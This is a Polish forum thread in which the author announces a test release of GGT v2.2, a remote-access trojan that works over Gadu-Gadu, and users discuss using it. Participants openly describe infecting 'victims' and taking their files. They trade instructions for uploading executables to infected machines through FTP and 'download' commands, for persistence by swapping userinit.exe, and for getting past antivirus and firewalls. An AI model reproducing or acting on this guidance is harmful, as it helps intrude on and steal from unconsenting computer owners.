GGT v.2.2

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
dzisiaj wydałem nowa wersje GGTv.2.2 , dodałem parę bajerów
smile.gif
i poprawiłem parę błędów, co nie znaczy że dalej niema błędów jest to wersja testowa, zapraszam do testów http://unitedcrew.net
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
fajnie , ciesze sie, jak znadziecie jakies błedy to prosze o info na forum lub na priv,@, obojetnie
<

pozdrawiam
 

astRX

Użytkownik
Dołączył
Maj 17, 2005
Posty
188
GGT jest super - dopiero zacząłem zabawę w takie rzeczy a już z kilku kompów ściągnąłem przeróżności...hehe. Szkoda tylko że na kompa ofiary nie można wgrywać swoich plików.....
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
jak masz mozliwosc polaczenia p2p to najlepiej postawic serwer FTP (polecenie "sftp <port> <dysk>") potem łaczysz sie z tym serwerem za pomoca np. TotalCommander, a jak niema mozliwosci p2p bo jest np. NAT to łączysz sie z zewnętrznym serwerem FTP (np. jakis darmowy hosting) polecenie "cftp" i "download" sciaga pliki z FTP po zalogowaniu lub bez logowania mozna poprostu podać link http:// , np: download http://jakis.pliczek.pl/ten.exe , wszystkie pliki sciagaja sie na dysk do folderu roboczego, sprawdz sobie poleceniem "cfg list" , mozna go zmienić na dowolny istniejacy folder,

//update [24.05]: na stronie jest od teraz dostepna poprawiona wersja GGTv.2.2 , poprawilem bład zwiazany z wysypywaniem sie winlogon.exe przy konfiguracji ggt "Podmiana userinit.exe"
 

djzielu

Użytkownik
Dołączył
Maj 27, 2004
Posty
16
Siemka Wojas pytanie za 100 punktów
smile.gif
dawniej w GGT mozna bylo kozystac z polecenia !deleteggt czy jakos tak w wersji 2.1 juz to nie bylo mozliwe czy w aktualnej da sie jakos usunac trojana z kompa ofiary ??
smile.gif


Jeszcze jedno ggt 2.2 nie generuje mi pliku serwera leci caly czas packing i nie chce skonczyc czy u mnie tylko tak jest ???
 

2ml

Użytkownik
Dołączył
Maj 23, 2005
Posty
1
niestety u mnie także pakuje w nieskończoność, lecz gdy anuluje, jest komunikat, że niby OK. jak to jest naprawde? ps. w tle chodzi norton. sens go kill'ować? bo tak nie bardzo chce go kiedykolwiek odłącząć??? 'ajudo'!!!
 

astRX

Użytkownik
Dołączył
Maj 17, 2005
Posty
188
dziwne - każdy do kogo podrzucam "servera" mówi że mu trojka podrzucam. A mam pełny mks_vir2005 i gdy skanuje server.exe to mi nic nie znajduje......(znajduje trojana tylko w całej aplikacji GaduGhostTrojan a w pliku "server.exe" nie)
 

Kornik52

Były Moderator
Dołączył
Sierpień 12, 2004
Posty
848
Wszystko fajnie tylko można bylo by dodać jedna opcje mianowicie zeby mozna bylo wczytywac sobie pliki ini zapisane na dysku w plikach tych znajdowaly by się już dane i nie musielibyśmy ich wpiswac po 5 razy
 

Wojass

Użytkownik
Dołączył
Sierpień 22, 2003
Posty
347
ok, jak nie zapomne to dodam tą opcje w normalnej wersji , dostępna jest na razie tylko wersja testowa GGT 2.2 , czekam az więcej błędów sie znajdzie
przy okazji informuje , aby na razie nie uzywać opcji startu z userinit.exe bo xpsp2 usuwa i przywraca oryginalny userinit.exe po restarcie
 

Kornik52

Były Moderator
Dołączył
Sierpień 12, 2004
Posty
848
Dzieki za podpowiedz ze zeby z userunitu nie kożystac to juz wiem czemu moja ofiara nie ma juz programu. ;]

Ach te Firewalle windowsowskie..
<


15264.jpg
 

slayd

Użytkownik
Dołączył
Luty 7, 2005
Posty
62
jesli chcesz zeby ci dochodzily na tlena screeny z gg to zainstaluj sobie plugin pikczer to powinno dzialac!!!

Pozdro
 

astRX

Użytkownik
Dołączył
Maj 17, 2005
Posty
188
kurde..........wersja 2.2 mi nie działa sprawdziłem na swoim kompie odpalając plik (założyłem nowy nr gg itp, wszystkie ustawienia ok). Odpaliłem wersję 2.1 i działa spoko. Czemu 2.2 mi nie chodzi ??
 

slayd

Użytkownik
Dołączył
Luty 7, 2005
Posty
62
a czasami nie masz jakiejs zapory bo ja tez mialem cos podobnego tylko ze mi obrazki nie dochodzily nawet od znajomych usunolem zapore i wszystko ladnie hula!!

Pozdro
 
Do góry Bottom